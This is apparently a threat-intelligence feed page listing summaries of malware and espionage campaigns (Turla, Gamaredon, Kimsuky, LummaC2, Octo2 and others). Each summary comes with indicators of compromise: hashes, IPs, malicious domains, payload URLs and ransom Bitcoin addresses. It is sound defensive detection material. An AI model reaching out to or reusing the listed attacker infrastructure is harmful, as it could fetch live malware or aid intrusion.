Cyber Threat Watch by AlienVault OTX

Cyber Threat Watch is a feature that monitors and displays the latest cyber threats. It presents information about threat campaigns, attack descriptions, and indicators of compromise (IoCs) such as file hashes and the domains involved, to help detect and respond to cyber threats more effectively. The information shown on this page is updated automatically to ensure you always receive the most current threat data.

Pulse Name / Description / IoCs
Unraveling SloppyLemming’s Operations Across South Asia
An investigation reveals SloppyLemming, an advanced threat actor targeting South and East Asian countries, particularly Pakistan. The group uses multiple cloud services for credential harvesting, malware delivery, and command and control. Their operations focus on government, law enforcement, energy, telecommunications, and technology entities in Pakistan, Bangladesh, Sri Lanka, and China. SloppyLemming employs phishing tactics, exploits vulnerabilities, and utilizes various malware tools. The actor's lack of operational security has provided insights into their tooling and infrastructure. Cloudflare has taken steps to disrupt the actor's operations and collaborated with industry partners to mitigate the threat.
Type Indicator
IPv4 139.59.109.136
IPv4 142.93.139.164
IPv4 149.28.153.250
IPv4 185.249.198.218
IPv4 45.137.116.8
IPv4 47.245.126.218
IPv4 47.254.229.56
CVE CVE-2023-38831
FileHash-MD5 659ab8cb034e557fce0c3ecd631f3590
FileHash-MD5 e2a32e7d772a9a4eeccee9c71ec3a6d4
FileHash-MD5 fa40357daaa8ed8e73eeef25f0f478ac
FileHash-SHA1 9b45b35d577680022e20d20dc7052463398ccf36
FileHash-SHA1 b53de85852479ea2a772bd3407b9e4d38eb1e1e7
FileHash-SHA1 bc490c61ce87efc0faf93dd4160219ef303e3e1d
FileHash-SHA256 06f82a8d80ec911498e3493ebefa8ad45e102dd887ce2edc11f8f51bafab2e80
FileHash-SHA256 3dfb8d198de95090e2ad3ffc9d9846af5c3074563acb0ce5b0ef62b20e4bf432
FileHash-SHA256 82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211
FileHash-SHA256 95cf90b2610c6f0ec67c1d669cd252468f6c3b8eaeea588f342d2bd74d90e093
FileHash-SHA256 a3c9b56a0ce787d7aa7787d9ff0e806a6fb0b216327591b1e1113391c609fd17
FileHash-SHA256 ac3dff91982709f575cfbc6954b61130b4eeab5d3759772db220f1b76836be4d
FileHash-SHA256 b6ae5b714f18ca40a111498d0991e1e30cd95317b4904d2ef0d49937f0552000
FileHash-SHA256 e3bc0246ab95b527aa86e52e62f554ab8db04523f35aee50b508d0fa48ab49f7
FileHash-SHA256 fb4397c837c7e401712764f953723153d5bb462bc944518959288ea47dec6446
IPv4 159.253.120.25
IPv4 159.65.6.251
IPv4 207.148.73.145
IPv4 208.85.22.252
IPv4 37.27.41.167
IPv4 47.236.65.190
IPv4 47.237.105.113
IPv4 47.237.20.135
IPv4 47.237.20.201
IPv4 47.237.25.198
IPv4 47.245.114.11
IPv4 47.245.2.77
IPv4 47.245.42.208
IPv4 47.245.56.29
IPv4 47.74.84.168
IPv4 47.74.87.155
IPv4 47.76.181.76
IPv4 47.76.61.241
IPv4 47.83.23.246
IPv4 8.219.114.124
IPv4 8.219.169.226
IPv4 8.222.235.145
domain cflayerprotection.com
domain cloudlflares.com
domain crec-bd.site
domain email.click
domain hit-pk.org
domain humariweb.info
domain itsupport-gov.com
domain jammycanonicalupdates.cloud
domain link.click
domain modp-pk.org
domain mofapak.info
domain opensecurity-legacy.com
domain paknavy-pk.org
domain quran-books.store
domain updpcn.online
hostname accounts.opensecurity-legacy.com
hostname acrobat.paknavy-pk.org
hostname api.opensecurity-legacy.com
hostname bin.opensecurity-legacy.com
hostname blabla.apl-com.icu
hostname browser.apl-org.online
hostname cloud.adobefileshare.com
hostname cloud.cflayerprotection.com
hostname confidential.zapto.org
hostname data.cloudlflares.com
hostname dawn.apl-org.online
hostname docs.apl-com.icu
hostname fonts.apl-org.online
hostname frontend-m.opensecurity-legacy.com
hostname hesco.hascolgov.info
hostname hurr.zapto.org
hostname locaal.navybd-gov.info
hostname localhost.apl-com.icu
hostname locall.hascolgov.info
hostname login.apl-org.online
hostname m.opensecurity-legacy.com
hostname mail.apl-com.icu
hostname mail.pakistangov.com
hostname mailpitb-securedocs.zapto.org
hostname monitor.opensecurity-legacy.com
hostname oil.hascolgov.info
hostname openkm.paknavy-pk.org
hostname owa-spamcheck.apl-org.online
hostname pitb.zapto.org
hostname redzone.apl-org.online
hostname redzone2.apl-org.online
hostname sco.zapto.org
hostname secure.cflayerprotection.com
hostname secure.cloudlflares.com
hostname sensors.opensecurity-legacy.com
hostname static.opensecurity-legacy.com
hostname update.apl-org.online
hostname www.168-gov.info
hostname www.cloudlflares.com
hostname www.crec-bd.site
hostname zero-berlin-covenant.apl-org.online
BBTok Targeting Brazil: Deobfuscating the .NET Loader with dnlib and PowerShell
This analysis dissects the infection chain of BBTok, a threat targeting Brazil. The malware utilizes an ISO image containing a shortcut file and various components. It employs the Microsoft Build Engine to compile and execute malicious C# code on the victim's machine. The core component, Trammy.dll, is obfuscated using ConfuserEx and utilizes AppDomain Manager Injection for execution. The malware creates a log file, gathers system information, and establishes persistence through scheduled tasks and service creation. It downloads additional components, including CCProxy for traffic manipulation, and a Delphi payload. The attack specifically targets Brazilian IP addresses and employs evasion techniques to avoid detection.
Type Indicator
FileHash-MD5 3aeefe5867b49d1d323502e2b86d40e1
FileHash-MD5 4d7d4d92dc7d86b72abf81821ff83837
FileHash-MD5 950e785d417105c2a8dae00571ef7923
FileHash-MD5 c479d696d08fc9414920deae7983ca8e
FileHash-SHA1 704efd1447be699762781a4b67e4c1ae1f7c9789
FileHash-SHA1 9672cade96c657a8860d60923afdbe4c46a2935d
FileHash-SHA1 970cdb16e5fc52be85e311f6c28dbb75086f1cf3
FileHash-SHA1 cc9f6c4f482d5fce70ed907d781db2d409e15bc3
FileHash-SHA256 09027fa9653bdf2b4a291071f7e8a72f14d1ba5d0912ed188708f9edd6a084fe
FileHash-SHA256 24fac4ef193014e34fc30f7a4b7ccc0b1232ab02f164f105888aabe06efbacc3
FileHash-SHA256 276a1e9f62e21c675fdad9c7bf0a489560cbd959ac617839aeb9a0bc3cd41366
FileHash-SHA256 27914c36fd422528d8370cbbc0e45af1ba2c3aeedca1579d92968649b3f562f7
FileHash-SHA256 2d2c2ba0f0d155233cdcbf41a9cf166a6ce9b80a6ab4395821ce658afe04aaba
FileHash-SHA256 2ff420e3d01893868a50162df57e8463d1746d3965b76025ed88db9bb13388af
FileHash-SHA256 35db2b34412ad7a1644a8ee82925a88369bc58f6effc11d8ec6d5f81650d897e
FileHash-SHA256 5e5a58bfabd96f0c78c1e12fa2625aba9c84aa3bd4c9bb99d079d6ccb6e46650
FileHash-SHA256 7559c440245aeeca28e67b7f13d198ba8add343e8d48df92b7116a337c98b763
FileHash-SHA256 7566131ce0ecba1710c1a7552491120751b58d6d55f867e61a886b8e5606afc3
FileHash-SHA256 8e7f0a51d7593cf76576b767ab03ed331d822c09f6812015550dbd6843853ce7
FileHash-SHA256 a3afed0dabefde9bb8f8f905ab24fc2f554aa77e3a94b05ed35cffc20c201e15
FileHash-SHA256 ac044dd9ae8f18d928cf39d24525e2474930faf8e83c6e3ad52496ecab11f510
FileHash-SHA256 b60eb62f6c24d4a495a0dab95cc49624ac5099a2cc21f8bd010a410401ab8cc3
FileHash-SHA256 cb1d2659508a4f50060997ee0e60604598cb38bd2bb90962c6a51d8b798a03b6
FileHash-SHA256 dc03070d50fdd31c89491d139adfb211daf171d03e9e6d88aac43e7ff44e4fef
FileHash-SHA256 ddf84fdc080bd55f6f2b409e596b6f7a040c4ab1eb4b965b3f709a0f7faa4e02
domain fileondemandd.site
hostname contador.danfajuda.com
Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy
Unit 42 researchers have uncovered two new malware samples used by the North Korean threat group Sparkling Pisces (aka Kimsuky). These include an undocumented keylogger called KLogEXE and a variant of a backdoor named FPSpy. The analysis reveals the group's evolving capabilities and extensive arsenal. Both malware samples share code similarities and utilize sophisticated techniques for data exfiltration and command execution. The research highlights Sparkling Pisces's continuous evolution, expanding infrastructure, and targeting of South Korean and Japanese entities. The discovery enhances understanding of the group's tactics and provides insights for better defense against such threats.
Type Indicator
FileHash-SHA256 2e768cee1c89ad5fc89be9df5061110d2a4953b336309014e0593eb65c75e715
FileHash-SHA256 990b7eec4e0d9a22ec0b5c82df535cf1666d9021f2e417b49dc5110a67228e27
FileHash-SHA256 a173a425d17b6f2362eca3c8ea4de9860b52faba414bbb22162895641dda0dc2
FileHash-SHA256 c69cd6a9a09405ae5a60acba2f9770c722afde952bd5a227a72393501b4f5343
FileHash-SHA256 faf666019333f4515f241c1d3fcfc25c67532463245e358b90f9e498fe4f6801
IPv4 152.32.138.167
hostname mail.apollo-page.r-e.kr
hostname nidlogin.apollo.r-e.kr
Analyzing the Newest Turla Backdoor
The Russian APT group Turla has launched a new campaign using shortcut files to infect systems with a fileless backdoor. The malware employs evasion techniques such as disabling ETW and AMSI, and unhooking. The attack begins with a shortcut file mimicking a PDF, which creates a file executed using MSBuild. The final payload is a fileless backdoor obfuscated with SmartAssembly. The backdoor implements custom commands for file creation and PowerShell script execution. It communicates with the C2 server using encrypted and encoded data. The analysis reveals sophisticated techniques to avoid detection, including DLL mapping to bypass hooks and patching of ETW and AMSI-related functions.
Type Indicator
FileHash-MD5 005c762a3c39b1114c6521f52acb66c3
FileHash-MD5 371ef30b422378d95f64804391f24818
FileHash-MD5 a88597f35bf778f4a0c21d7f231c9091
FileHash-SHA1 19d576e1a7c0c7e6dae6dce79743db5f2defa79f
FileHash-SHA1 47791e973dc71e23de8635d801509149d9d74288
FileHash-SHA1 bcbdff86daeb92215081dffc8660900816159721
FileHash-SHA256 7091ce97fb5906680c1b09558bafdf9681a81f5f524677b90fd0f7fc0a05bc00
FileHash-SHA256 8d6fe8e336e020410753ff15ece5f36bae992f7f234385a23590a11ed734792d
FileHash-SHA256 b6abbeab6e000036c6cdffc57c096d796397263e280ea264eba73ac5bab39441
FileHash-SHA256 cac4d4364d20fa343bf681f6544b31995a57d8f69ee606c4675db60be5ae8775
hostname files.philbendeck.com
Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023
This report provides a comprehensive analysis of the toolset used by the Russia-aligned Gamaredon APT group to conduct cyberespionage activities against Ukraine in 2022 and 2023. The group has been active since 2013 and is currently the most prolific threat actor targeting Ukrainian governmental institutions. Gamaredon employs a variety of custom malware tools written in PowerShell, VBScript, and C, as well as some open-source tools. The analysis covers their tactics for initial access, including spearphishing and weaponized documents and USB drives. It details numerous tools used for downloading payloads, dropping files, weaponizing systems, stealing data, and maintaining backdoor access. The report also examines Gamaredon's obfuscation techniques, network infrastructure, and methods for bypassing domain-based blocking.
Type Indicator
IPv4 5.181.156.109
IPv4 161.35.106.28
IPv4 185.163.47.177
IPv4 185.225.19.16
FileHash-SHA1 025e3d88c53fc12d5a4aab726e696f2815bac84d
FileHash-SHA1 04f1ed3050d6b2527d6196dff5845b10510d0c2f
FileHash-SHA1 0fa9303ed739a3c6a76cef4517b9adb60c73ca80
FileHash-SHA1 0fd02b12517221f71a4a3774630c05643ee59988
FileHash-SHA1 13ba279d8602fee7cede152b6a9148cd9d2f6662
FileHash-SHA1 16fd6cba3f13cc5b195cd6c0dd33bbf08cd0fe39
FileHash-SHA1 1aeae7a567c71200ba804801c4cec227d2b64414
FileHash-SHA1 224b18e531e511cea2849d9a3b9cf5ad502afecc
FileHash-SHA1 2416dfc031cf0d05054d5beb9739cba6470fe585
FileHash-SHA1 28f4f0367c2bb0574c8a7d1b9c3e71e6ac678300
FileHash-SHA1 2b9b0ad0b65bb6101704684cd339e946fae2dcfa
FileHash-SHA1 2cdb1da4df1a33e379c2f24dd6a05709f4848cb6
FileHash-SHA1 44c720ae508f448263a83cac26775d6709dfbbdd
FileHash-SHA1 47a03ebb9798a8df7ec8212134d418e937b449e9
FileHash-SHA1 49cf239ab2ebd04cafdcec07fbb0c1c1a43e8c02
FileHash-SHA1 4f915541291120aa100123c1c93fa7de78f46a3f
FileHash-SHA1 565a4cd6e4f74e17a37d34e6ef93ab6ded71b3aa
FileHash-SHA1 5720ffdf9d9cd649445cbc12844e2b587622643a
FileHash-SHA1 5befc01a3771e61151224e18f926226ff7fd4a40
FileHash-SHA1 6d694b73a2c497f16eb9b5cca883658397ffbedf
FileHash-SHA1 742e34ba21650ecb0b7ef33f786641f0be823be8
FileHash-SHA1 7793282401b134077e70217b55b0c4b45850d119
FileHash-SHA1 801a9b08987977692223b7105dec8b21b9d9749e
FileHash-SHA1 82123c17117ef235f3b57d0c5572c861e3ed7173
FileHash-SHA1 821362a484908e93f8ba748b600665ae6444303d
FileHash-SHA1 8a2261d8c8111d2d99276575120b9ea65d0aeaea
FileHash-SHA1 9a6b36e6cad9156ea6e09de740d3f1ccb6816f87
FileHash-SHA1 9b6ef236d9dc758336f1d89268822f8611c8b973
FileHash-SHA1 9e30dffdb88dd3adfab4cd5c67a98336c4bf9504
FileHash-SHA1 a3c21f9a493a05f9428e8f5fe5af7f0c2bf67f95
FileHash-SHA1 a93503bbb613f084add338b9fa2eee466bf3a2d6
FileHash-SHA1 ac17fd08a3987cc91dfd6649ba3dabe8a9671305
FileHash-SHA1 b08305c557692619b9d0eaf5b58a8b91858cf4d5
FileHash-SHA1 b2b58cef19546b2d2284b2eb5f22b6d8fdb94d4e
FileHash-SHA1 b50f10bbdb49be6d868b09f3e1dd6c78d58d8e89
FileHash-SHA1 b99d4724077b0a2cbeee38332c05f3d4171c9dcc
FileHash-SHA1 ba2366ed4e83ffc6dec489c9011fe181ce169a47
FileHash-SHA1 ba5f7e2fa9be1cb3fc7ae113f41c36e4f2c464b6
FileHash-SHA1 cb9712bed15723973171192da17946bf6778d98d
FileHash-SHA1 d5576e578518e474a5dff654c44ab3ec4a6e4ecf
FileHash-SHA1 d58bfb39969f28698f90bf2e8782057e2f83c2df
FileHash-SHA1 df1c0a70e7a02b839ab3aac3fc410e61eefb58eb
FileHash-SHA1 e0bd8855159cb708789c4de183e107c5c117fba1
FileHash-SHA1 e2feee0b92819ac7fca85cfe3dc37750834f0990
FileHash-SHA1 e537deaf3a77c5c0f0b9f8a12ff5995dd24cd259
FileHash-SHA1 f05874c1b908fdef4b9af2b084e3d813595a12c9
FileHash-SHA1 fea57a486eb4bdac5e7d59c9958c42293a5abe12
IPv4 141.98.233.17
IPv4 143.198.160.45
IPv4 159.223.152.63
IPv4 164.92.115.188
IPv4 165.227.208.207
IPv4 167.172.139.39
IPv4 185.163.45.5
IPv4 188.166.247.34
IPv4 194.180.191.30
IPv4 195.133.88.128
IPv4 209.97.165.187
IPv4 212.18.104.56
IPv4 46.29.234.46
IPv4 5.252.178.140
IPv4 62.133.62.73
IPv4 67.205.160.237
IPv4 68.183.2.92
IPv4 80.90.181.107
IPv4 89.185.84.141
IPv4 89.185.84.204
IPv4 89.19.209.154
IPv4 89.23.107.188
IPv4 91.200.148.232
domain absorbeni.ru
domain amasiyagi.ru
domain consentesto.ru
domain dfgqdsd.ru
domain fritopa.ru
domain goloser.ru
domain hakold.ru
domain havxcq.ru
domain hulortad.ru
domain lokalut.ru
domain loturam.ru
domain marginisbi.ru
domain nikortal.ru
domain nododru.ru
domain opela.ru
domain retarus.ru
domain rieturc.ru
domain statuesque.ru
domain tolofa.ru
domain using.ru
domain youdad.ru
hostname login.kifales.ru
hostname www.toorisugita.ru
MimiStick — imitators of Sticky Werewolf
F.A.C.C.T. Threat Intelligence discovered a malicious file targeting Russian defense industry enterprises. Initially thought to be the work of Sticky Werewolf, further analysis revealed a new threat actor named MimiStick. The attack used a PDF lure mimicking a letter from the Russian Ministry of Labor. The malware employed a multi-stage infection chain, ultimately deploying a Sliver implant. Later findings confirmed the campaign was indeed Sticky Werewolf, who had expanded their toolkit to include the Sliver implant alongside their existing Quasar RAT. The group registered multiple domains, including one impersonating the Ministry of Labor, likely for future phishing campaigns.
Type Indicator
FileHash-MD5 0756de02dd3b4be840d31c8871148f7f
FileHash-MD5 5ed144351c41eb690d86c523690eb265
FileHash-MD5 67aa63c4518a3604e37f89ad0d39a34d
FileHash-MD5 725e5068bd68c3d055f3a814f402a8be
FileHash-MD5 7e151444c98ef2cf084eed8e6d4be807
FileHash-MD5 873454911a81a6c892838c44cbb3059b
FileHash-SHA1 2849ad434d55b8f2bc067c37903b5ff5bad01dbd
FileHash-SHA1 3100e869b1052dee920f7f2ca35da60abdf5aac0
FileHash-SHA1 3fba74f0f7f91f665ad68db9004f1fec3486595b
FileHash-SHA1 c15716d127961eb1ca4c4d6192af6e1c5c8a2d8d
FileHash-SHA1 e8ba03b13f9b51abcc9a539d09f98b61b2b4ccd0
FileHash-SHA1 efd81a26fd43124d435bc0223c5f42839f793d42
FileHash-SHA256 3877f9fd6b21ee735130421dcf997cf000ae66b20a1c6a490f23431b2f95fa90
FileHash-SHA256 5ad093aa3eaf2bb76003f8f2f9de9b1368640aa320fa8d77df2c773f75186a71
FileHash-SHA256 65096aa2895025d94b934eb4198ea160e067e8e5c97d9ea252cb2de3870b7b2f
FileHash-SHA256 8d83a598aa61a3f2e61bfdcdfc7b29b4c8d357eb43562d349053defa1ce50d78
FileHash-SHA256 b262dd5373213c5af573a08b409f8142c7f9f92b19536d7d78b4515d23452321
FileHash-SHA256 ff16334c4cbbfed4bfca23436493397d0465c643cce6cbe41426067bb1ce14ff
IPv4 213.183.54.123
domain about-tech.ru
domain borosan.ru
domain min-trud-gov.ru
domain mysafer.ru
domain orkprank.ru
domain rtxcore.ru
domain techitzone.ru
Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations
This advisory outlines the activities of an Iran-based cyber threat group that has conducted numerous intrusions against organizations in the United States and other countries since 2017, with the goal of obtaining network access to facilitate ransomware attacks. The group, known by various names such as Pioneer Kitten and UNC757, exploits vulnerabilities in public-facing devices to gain initial access, and then uses techniques like credential theft, remote access tools, and webshells to maintain persistence and move laterally within compromised networks. A significant portion of their operations involves collaborating with ransomware affiliates like NoEscape and ALPHV to deploy ransomware and extort victims. The advisory provides details on the group's tactics, techniques, procedures, indicators of compromise, and recommended mitigations.
Type Indicator
BitcoinAddress bc1q2egjjzmchtm3q3h3een37zsvpph86hwgq4xskh
BitcoinAddress bc1q6620fmev7cvkfu82z43vwjtec6mzgcp5hjrdne
BitcoinAddress bc1q6w2an66vrje747scecrgzucw9ksha66x9zt980
BitcoinAddress bc1q8n7jjgdepuym825zwwftr3qpem3tnjx3m50ku0
BitcoinAddress bc1qjzw7sh3pd5msgehdaurzv04pm40hm9ajpwjqky
BitcoinAddress bc1ql837eewad47zn0uzzjfgqjhsnf2yhkyxvxyjjc
BitcoinAddress bc1qlwd94gf5uhdpu4gynk6znc5j3rwk9s53c0dhjs
BitcoinAddress bc1qn5tla384qxpl6zt7kd068hvl7y4a6rt684ufqp
BitcoinAddress bc1qr6h2zcxlntpcjystxdf7qy2755p25yrwucm4lq
BitcoinAddress bc1qsn4l6h3mhyhmr72vw4ajxf2gr74hwpalks2tp9
BitcoinAddress bc1qtjhvqkun4uxtr4qmq6s3f7j49nr4sp0wywp489
BitcoinAddress bc1qx9tteqhama2x2w9vwqsyny6hldh8my8udx5jlm
BitcoinAddress bc1qy8pnttrfmyu4l3qcy59gmllzqq66gmr446ppcr
BitcoinAddress bc1qz75atxj4dvgezyuspw8yz9khtkuk5jpdgfauq8
FileHash-SHA256 0a6f992e1372db4f245595424a7436ebb610775d6addc4d568acc2af5d315221
FileHash-SHA256 14f8ad7d1553d1a47cf4c9e7bedabcc5b759c86e54c636175a472c11d7dec70f
FileHash-SHA256 185ada4556737a4f26ae16f1a99ca82ab5684c32719ee426c420c0bc14384a0a
FileHash-SHA256 2c76104c9aaaf32453a814c227e7d9d755451b551a3fd30d2ea332df396b3a31
FileHash-SHA256 3488458145eb62d7d3947e3811234f4663d9b5aeef6584ab08a2099a7f946664
FileHash-SHA256 b761680e23f2ebb5f6887d315ebd05b2d7c365731e093b49adb059c3dccaa30c
FileHash-SHA256 ea2ec0c3859d8d8c36d95a298beef6d7add17856655bfbea2554b8714f7c7c69
domain githubapp.net
hostname api.gupdate.net
hostname cloud.sophos.one
hostname login.forticloud.online
Inside the Dragon: DragonForce Ransomware Group
In this blog, Group-IB delves into the inner workings of the DragonForce ransomware group. Discovered in August 2023, DragonForce has been targeting companies in critical sectors using a variant of a leaked LockBit3.0 builder, and more recently, in July 2024, with their own variant of ransomware. DragonForce operates a Ransomware-as-a-Service (RaaS) affiliate program with two variants: one based on LockBit3.0, and another that, though initially claimed as original, is based on ContiV3. The group employs double extortion tactics, encrypting data and threatening leaks unless a ransom is paid.
Type Indicator
IPv4 185.73.125.8
IPv4 94.232.46.202
IPv4 69.4.234.20
IPv4 2.147.68.96
IPv4 185.59.221.75
FileHash-MD5 97b70e89b5313612a9e7a339ee82ab67
FileHash-MD5 a50637f5f7a3e462135c0ae7c7af0d91
FileHash-MD5 bb7c575e798ff5243b5014777253635d
FileHash-MD5 c111476f7b394776b515249ecb6b20e6
Infrastructure linking PandorahVNC and Mesh Central
This analysis investigates PandorahVNC, a sophisticated Hidden Virtual Network Computing tool, and its connections to a new service called AnonVNC. The report explores the online presence of the tool's creator, known as 'All_father', and examines the infrastructure used for both PandorahVNC and AnonVNC. It reveals links between these services and MeshCentral, a legitimate remote session manager. The investigation uncovers potential new developments in the creator's toolkit, including the use of MeshCentral's Mesh Agent. The report also discusses various threat actors who have leveraged PandorahVNC for malicious purposes, ranging from state-sponsored groups to cybercriminals.
Type Indicator
IPv4 62.112.11.136
FileHash-MD5 c7c699eb8695a564fe0b400b1bf138ba
FileHash-SHA1 52e3be4428c5c2b42d64ba9bcc584472391157c5
IPv4 141.95.6.166
IPv4 51.254.27.112
IPv4 66.94.109.162
IPv4 94.131.121.91
domain anonvnc.com
domain hiddenvnc.com
domain hvncs.com
domain pandorahvnc.shop
domain validatax.com
domain vncapk.io
LummaC2: Obfuscation Through Indirect Control Flow
This analysis examines a control flow obfuscation technique used by recent LummaC2 stealer samples. The malware employs customized control flow indirection to manipulate execution, hindering reverse engineering and automated analysis. The obfuscation transforms functions into 'dispatcher blocks' that use encoded offsets and indirect jumps to obscure the original control flow. Three main dispatcher types are identified: register-based, memory-based, and mixed-order. The analysis also covers conditional dispatcher logic for loops and syscalls. To deobfuscate, the researchers developed an automated method using symbolic backward slicing to differentiate dispatcher instructions from original code and recover the true control flow. This allows rebuilding deobfuscated functions for analysis.
Type Indicator
FileHash-MD5 205e45e123aea66d444feaba9a846748
FileHash-MD5 5099026603c86efbcf943449cd6df54a
FileHash-MD5 d01e27462252c573f66a14bb03c09dd2
Sophisticated Malware Campaign Targets Czech Officials Using NATO-Themed Decoys
Seqrite Labs APT-Team discovered a sophisticated malware campaign targeting government and military officials in the Czech Republic. The campaign leveraged NATO-themed decoy documents to lure victims and employed a multistage attack chain involving a malicious batch script, a Rust-based loader, and the Havoc post-exploitation framework. The campaign utilized advanced techniques like ETW patching, process injection, and encrypted payloads to evade detection and establish persistence on compromised systems. The threat actor behind the operation appears to have Russian origins and used open-source offensive tools extensively.
Type Indicator
FileHash-MD5 00a78177ed7a711c8cdddcb73d4f9784
FileHash-MD5 6eb2eb8f723163932b51ffb5274f5304
FileHash-MD5 a077b9179728e25aad4334f89bd5dd36
FileHash-MD5 a08edbfab6084c1861f8e7aecaf8c25d
FileHash-MD5 a8d7e56eb01a8cf576533db9af2e92ec
FileHash-MD5 b31b8310a136a0ba4e90b368a351f53f
FileHash-MD5 de31247081978512be6a8ca58b4752a4
FileHash-SHA1 192f767c2d27966f50109fb62ff645fe38cc8d97
FileHash-SHA1 20ed156d55454bf084004b39115073d0b2551355
FileHash-SHA1 3593d39611d8e1ecb190ec76cedab4c1e214be72
FileHash-SHA1 6c1bdbc71f93642f0b5b9dfc85ae1501510f5e12
FileHash-SHA1 8d2e67d031ce8d3c7f65dcdf7dfcdd28dea19bd9
FileHash-SHA1 a960549eb634dbc781dc617f9000d3d29aa8711a
FileHash-SHA1 ab26bff6f61dfe1fef20656e364c4492ba1ab335
FileHash-SHA256 1dbcade04333b9dc81ba0746bc604d12489da49b9b65fcb5b1f61d139dc5949c
FileHash-SHA256 38da8d1576bdd0a03e649e8e6543594b35a423aa5b0a0c4081fc477c8e487e09
FileHash-SHA256 436994d4a5c8d54acb2b521d0847d77e6af6c2c0e40468248b1dd019c6dafa84
FileHash-SHA256 6e0d12cd0252599fd1dec7aa460cae7a12a1b2e322b6664e64c773c23627d1b4
FileHash-SHA256 8820e0c249305ffa3d38e72a7f27c0e2195bc739d08f5d270884be6237eea500
FileHash-SHA256 9549d3d2b8e8b4e8f163a8b9fa3b02b8a28d78e4b583baccb6210ef267559c6e
FileHash-SHA256 a05d053174b52a9b158a5ec841c1a7633b9368c4ac2da371a11a9364f8a8dc60
FileHash-SHA256 ace33243994a9da0797601bdd4191e25967a1da2644f0d0b530e26c71854d5d9
FileHash-SHA256 b29ed89e0428ba476459adabb5630c8d29f7fee5905c5de10d792fe3a02e52a6
FileHash-SHA256 ed6775184051ef36c3049e24167471ab42bd4301e99631c8423d4d753cdad455
FileHash-SHA256 fda71a7de6d473826465bb83210107501e66a5d96e533772444b3b24806286fd
URL https://206.188.197.113/
WalletConnect Scam: A Case Study in Crypto Drainer Tactics
An investigation uncovered a malicious app on Google Play targeting mobile users to steal cryptocurrency. The app, posing as a legitimate WalletConnect tool, used advanced evasion techniques to avoid detection for nearly five months. It achieved over 10,000 downloads through fake reviews and branding. The attackers used social engineering and a modern crypto drainer toolkit, stealing approximately $70,000 from over 150 victims. The malware, identified as MS Drainer, supports multiple blockchains and employs sophisticated methods to drain user wallets. This case highlights the growing sophistication of cybercriminal tactics in decentralized finance, emphasizing the need for vigilance among users and improved security measures in app stores.
Type Indicator
FileHash-SHA256 42330ccaaacea8a18794c7e9fad100de31ea415bff7821e407b9ac70ef690032
FileHash-SHA256 bf557e975733c113acc38daa18ca1849a1022b4c30b118899f68210cd3c7f990
FileHash-SHA256 ea526792150e71402f896ddaf1f04aedcb1356aea3bfebbcaf6c90bcdde7aa0c
domain cakeserver.online
domain mestoxcalculator.com
domain web3protocol.online
HZ Rat backdoor for macOS harvests data from WeChat and DingTalk
A version of the HZ Rat backdoor targeting users of China’s WeChat and DingTalk was uploaded to VirusTotal in July 2023 and was not detected by any vendor, research by Kaspersky suggests.
Type Indicator
FileHash-MD5 0c3201d0743c63075b18023bb8071e73
FileHash-MD5 287ccbf005667b263e0e8a1ccfb8daec
FileHash-MD5 6cc838049ece4fcb36386b7a3032171f
FileHash-MD5 6d478c7f94d95981eb4b6508844050a6
FileHash-MD5 7005c9c6e2502992017f1ffc8ef8a9b9
FileHash-MD5 7355e0790c111a59af377babedee9018
FileHash-MD5 7a66cd84e2d007664a66679e86832202
FileHash-MD5 7ed3fc831922733d70fb08da7a244224
FileHash-MD5 8d33f667ca135a88f5bf77a0fab209d4
FileHash-MD5 9cdb61a758afd9a893add4cef5608914
FileHash-MD5 a5af0471e31e5b11fd4d3671501dfc32
FileHash-MD5 da07b0608195a2d5481ad6de3cc6f195
FileHash-MD5 dd71b279a0bf618bbe9bb5d934ce9caa
SilentSelfie: Revealing a major campaign against Kurdish websites
A large-scale cyber espionage campaign targeting Kurdish websites was uncovered, involving 25 compromised sites using four variants of malicious scripts. The attacks ranged from simple location tracking to prompting users to install malicious Android apps. Despite lacking sophisticated techniques, the campaign's scale and duration were notable, operating undetected since late 2022. The compromised sites were linked to Kurdish media, political organizations, and the Rojava administration in Syria. A malicious Android app disguised as a news app was also discovered, capable of exfiltrating user data. While attribution remains uncertain, potential actors include Turkish intelligence, Syrian government, or the Kurdistan Regional Government of Iraq.
Type Indicator
FileHash-MD5 7ff9e87f8c8ea10e6aa688c491c81283
FileHash-SHA1 6c75d5f31fe386a1ec94b85cfb7f873b2e100062
FileHash-SHA256 2d75110d4c227c59b9c8fb02cc54b99d0b41e33a2fe1ad50e2fdf0cfb1e701d5
IPv4 170.75.161.102
IPv4 23.95.14.63
IPv4 24.246.223.228
URL http://170.75.161.102/asd.js
URL http://rojnews.news/wp-includes/sitemaps/
URL http://ronahi.video/wo_cookie.php
URL http://ronahi.video/wo_cookies.php
URL http://webmail.onlinearuba.net/7b2[redacted]600a/logs.php
URL https://rojnews.news/ku/wp-content/mobile.html
URL https://targetplatform.net/mobile.html
domain ciwanensoresger.com
domain dicle.fm
domain dirbesiye.fm
domain halkin-dg.com
domain hbdh.info
domain init4afrin.org
domain kongra-star.org
domain leftkup.com
domain lekolin.org
domain nuceciwan129.xyz
domain orkesfm.com
domain pajk.org
domain ronahi.net
domain ronahi.video
domain sdf-press.com
domain sehidenrojava.com
domain star-fm.net
domain targetplatform.net
domain tev-dem.com
domain thkp-c.org
domain ypj-office.com
domain ypjrojava.net
domain yra-ufm.com
domain zindi24.com
hostname webmail.onlinearuba.net
YARA fd8e25d1e0865fc8a7fb33fa1797fa1a4f4ce88e
YARA 936ac199159f316087973a74e1fe9b155868ae83
YARA 02a8dd33b54ec801ad073001e2d384ee9da98dbb
YARA d4f3cad0a5fb11f974b37c1d2b8b3a1db46205f5
YARA 23c7b8bd11b06151c643982dc7fb5a34278c46ec
YARA e1e6e66c027890b03eccd00c4730f61fdb3d3c6d
YARA 21af2ccd18add5f947bbd0684012b63e58beb4a1
European Banks Already Under Attack by New Malware Variant
A new version of the Octo malware, named Octo2, has emerged as a significant threat to European banks. This variant builds upon the capabilities of its predecessor, which was already a dominant force in mobile malware. Octo2 features improved remote access capabilities, sophisticated obfuscation techniques, and a Domain Generation Algorithm (DGA) for communication with command and control servers. Initial campaigns have been observed in Italy, Poland, Moldova, and Hungary, targeting banking applications. The malware's developers have focused on enhancing stability for Device Takeover attacks and implementing advanced anti-detection measures. With the original Octo source code leaked, Octo2 represents an escalation in the mobile threat landscape, posing increased risks to mobile banking security worldwide.
